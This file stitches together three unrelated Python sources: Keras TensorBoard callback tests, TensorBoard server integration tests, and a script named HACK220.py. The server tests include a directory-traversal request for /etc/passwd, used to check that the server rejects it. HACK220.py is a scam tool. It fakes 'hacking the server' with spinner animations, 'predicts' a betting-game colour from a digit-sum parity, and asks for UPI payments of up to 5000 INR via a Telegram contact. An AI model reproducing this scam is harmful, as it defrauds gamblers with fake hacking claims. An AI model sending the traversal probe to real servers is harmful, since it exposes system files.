_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, dirnames, filenames) in os.walk(self.logdir):
del dirnames # unused
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def test_custom_summary(self):
if not testing_utils.should_run_tf_function():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = summary_pb2.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with summary_ops_v2.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return summary_ops_v2.write(
tag=tag,
tensor=math_ops.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', math_ops.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensoriBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
class MostRecentlyModifiedFileMatchingPatternTest(test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
checkpoint_management.update_checkpoint_state_internal(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
if __name__ == '__main__':
test.main()
|
application_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import tempfile
import threading
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
from werkzeug import serving
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.summary import event_multiplexer
from tensorflow.python.summary.writer import writer as writer_lib
from tensorflow.tensorboard.backend import application
class TensorboardServerTest(test.TestCase):
_only_use_meta_graph = False # Server data contains only a GraphDef
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
self.temp_dir = self._GenerateTestData()
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
plugins = {}
app = application.TensorBoardWSGIApp(
self.temp_dir, plugins, multiplexer, reload_interval=0)
self._server = serving.BaseWSGIServer('localhost', 0, app)
# 0 to pick an unused port.
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers=None):
"""Perform a GET request for the given path."""
if headers is None:
headers = {}
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
data = response.read()
if response.getheader('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 400)
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._getJson('/data/logdir')
self.assertEqual(parsed_object, {'logdir': self.temp_dir})
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(
isinstance(run_json['run1']['firstEventTimestamp'], numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(
run_json,
{
'run1': {
'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
# if only_use_meta_graph, the graph is from the metagraph
'graph': True,
'meta_graph': self._only_use_meta_graph,
'run_metadata': ['test run']
}
})
def testApplicationPaths_getCached(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/',): # TODO(jart): '/app.js' in open source
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(
response.getheader('Cache-Control'),
'private, max-age=3600',
msg=path)
connection.close()
def testDataPaths_disableAllCaching(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/data/runs', '/data/logdir',
'/data/scalars?run=run1&tag=simple_values',
'/data/scalars?run=run1&tag=simple_values&format=csv',
'/data/images?run=run1&tag=image',
'/data/individualImage?run=run1&tag=image&index=0',
'/data/audio?run=run1&tag=audio',
'/data/run_metadata?run=run1&tag=test%20run'):
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(response.getheader('Expires'), '0', msg=path)
response.read()
connection.close()
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = graph_pb2.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptGzip_doesNotCompressImage(self):
response = self._get('/data/individualImage?run=run1&tag=image&index=0',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), None)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = config_pb2.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
- scalar events containing the value i at step 10 * i and wall time
100 * i, for i in [1, _SCALAR_COUNT).
- a graph definition
Returns:
temp_dir: The directory the test data is generated under.
"""
temp_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = writer_lib.FileWriter(run1_path)
histogram_value = summary_pb2.HistogramProto(
min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = graph_pb2.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
meta_graph_def = meta_graph_pb2.MetaGraphDef(graph_def=graph_def)
if self._only_use_meta_graph:
writer.add_meta_graph(meta_graph_def)
else:
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = config_pb2.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = summary_pb2.Summary.Image(
height=1, width=1, colorspace=1, encoded_image_string=encoded_image)
audio_value = summary_pb2.Summary.Audio(
sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(
event_pb2.Event(
wall_time=0,
step=0,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='histogram', histo=histogram_value),
summary_pb2.Summary.Value(
tag='image', image=image_value), summary_pb2.Summary.Value(
tag='audio', audio=audio_value)
])))
# Write 100 simple values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(
event_pb2.Event(
# We use different values for wall time, step, and the value so we
# can tell them apart.
wall_time=100 * i,
step=10 * i,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='simple_values', simple_value=i)
])))
writer.flush()
writer.close()
return temp_dir
class TensorboardServerUsingMetagraphOnlyTest(TensorboardServerTest):
# Tests new ability to use only the MetaGraphDef
_only_use_meta_graph = True # Server data contains only a MetaGraphDef
class ParseEventFilesSpecTest(test.TestCase):
def testRunName(self):
logdir = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testMultipleDirectories(self):
logdir = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testNormalizesPaths(self):
logdir = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testAbsolutifies(self):
logdir = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsGCSPath(self):
logdir = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsHDFSPath(self):
logdir = 'hdfs://foo/path'
expected = {'hdfs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir = 'gs://~/foo/path'
expected = {'gs://~/foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotNormalizeGCSPath(self):
logdir = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRunNameWithGCSPath(self):
logdir = 'lol:gs://foo/path'
expected = {'gs://foo/path': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
class TensorBoardAssetsTest(test.TestCase):
def testTagFound(self):
tag = resource_loader.load_resource('tensorboard/TAG')
self.assertTrue(tag)
if __name__ == '__main__':
test.main()
|
HACK220.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
from os import system, name
import itertools
import threading
import time
import sys
import datetime
from base64 import b64decode,b64encode
from datetime import date
expirydate = datetime.date(2021, 9, 24)
#expirydate = datetime.date(2021, 8, 30)
today=date.today()
green="\033[3;32m"
neon="\033[3;36m"
nc="\033[00m"
red="\033[3;31m"
purple="\033[3;34m"
yellow="\033[3;33m"
voilet="\033[3;35m"
def hero():
def chalo():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']) :
if done:
break
sys.stdout.write('\rhacking in the bcone server for next colour--------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def chalo1():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rgetting the colour wait --------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def getSum(n):
sum=0
for digit in str(n):
sum+= int(digit)
return sum
clear()
y=1
newperiod=period
banner='figlet RXCEV2.1|lolcat'
numbers=[]
while(y):
clear()
system(banner)
print(f"{red}Contact me on telegram @hackmgk")
print(f"{yellow}Enter ",newperiod," Bcone Price :")
current=input()
current=int(current)
chalo()
print("\n---------Successfully hacked the server-----------")
chalo1()
print("\n---------Successfully got the colour -------------")
print('\n')
last2=str(current)[-2:]
#samjha_maadarchod=lawde_time_pe_khel(last2)
if(newperiod%2==0):
sum=getSum(current)
if(sum%2==0):
print(newperiod+1," : 🔴, RED")
else:
print(newperiod+1," : 🟢, GREEN")
else:
sum=getSum(current)
if(sum%2==0):
print(newperiod+1," : 🔴, RED")
else:
print(newperiod+1," : 🟢, GREEN")
newperiod+=1
numbers.append(current)
y=input("Do you want to play : Press 1 and 0 to exit \n")
if(y==0):
y=False
if (len(numbers)>11):
clear()
system('figlet Thank you!!')
print("Play on next specified time!!")
print("-----------Current Time UP----------")
sys.exit(" \n \n \n Contact on Telegram @hackmgk")
#print(numbers)
if(expirydate>today):
now = datetime.datetime.now()
First = now.replace(hour=13, minute=55, second=0, microsecond=0)
Firstend = now.replace(hour=14, minute=35, second=0, microsecond=0)
Second = now.replace(hour=16, minute=25, second=0, microsecond=0)
Secondend = now.replace(hour=17, minute=35, second=0, microsecond=0)
Third = now.replace(hour=15, minute=55, second=0, microsecond=0)
Thirdend = now.replace(hour=16, minute=35, second=0, microsecond=0)
Final = now.replace(hour=17, minute=55, second=0, microsecond=0)
Finalend = now.replace(hour=18, minute=35, second=0, microsecond=0)
if (now>Third and now<Thirdend):
period=320
hero()
elif(now):
period=340
hero()
elif(False):
period=340
hero()
elif(False):
period=360
hero()
else:
banner='figlet RXCEV2.1'
system(banner)
#print(f"{red}"Hi!! Thanks for buying the hack")
print("Hi! thanks for trying our DEMO")
print("----------Your play time-----------")
#print("31st Aug 2021, 11:00 AM- 11:30 AM")
#print("31st Aug 2021, 02:00 PM- 02:30 PM")
print("23rd Sept 2021, 04:00 PM- 04:30 PM")
#print("31st Aug 2021, 08:00 PM- 08:30 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print(" admin on telegram @hackmgk ")
else:
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
code="BHFGV985"
code1="NJHBWE23"
code2="MKAAHDBD4"
test="BHGFV43"
night="NICMJY13"
nextday="NNMKJHFD"
banner='figlet RXCEV2.1|lolcat'
rava=0
now = datetime.datetime.now()
Second = now.replace(hour=10, minute=55, second=0, microsecond=0)
Secondend = now.replace(hour=14, minute=55, second=0, microsecond=0)
Third = now.replace(hour=15, minute=30, second=0, microsecond=0)
Thirdend = now.replace(hour=18, minute=34, second=0, microsecond=0)
Final = now.replace(hour=18, minute=35, second=0, microsecond=0)
Finalend = now.replace(hour=22, minute=35, second=0, microsecond=0)
if(now>Second and now<Secondend):
rava=290
elif(now>Third and now<Thirdend):
rava=350
elif(now>Final and now<Finalend):
rava=410
system(banner)
print(f"{neon}*--------*--------*-------*---------*---------*")
print("Your hack has expired--- Please contact")
print(" on telegram ----@hackmgk for activating")
print(" Plan Amount -- Total limit " )
print(" 1. 1000 INR ------- 1 Day (30 Games")
print(" 2. 2500 INR ------- 3 Days(90 Games")
print(" 2. 5000 INR ------- 7 Days(210 Games")
print("*---------*----------*-------------*----------*")
print("If you need any discount contact me")
print("Beware of fraudsters!!!")
while(True):
print("My banking name is MUKESH")
print(f"{red}After You Pay to The UPI ID above You Can Automatically")
print(f"Activate Hack By Entering The Correct ")
print(f"{green}(UTR) Or Upi Reference Number")
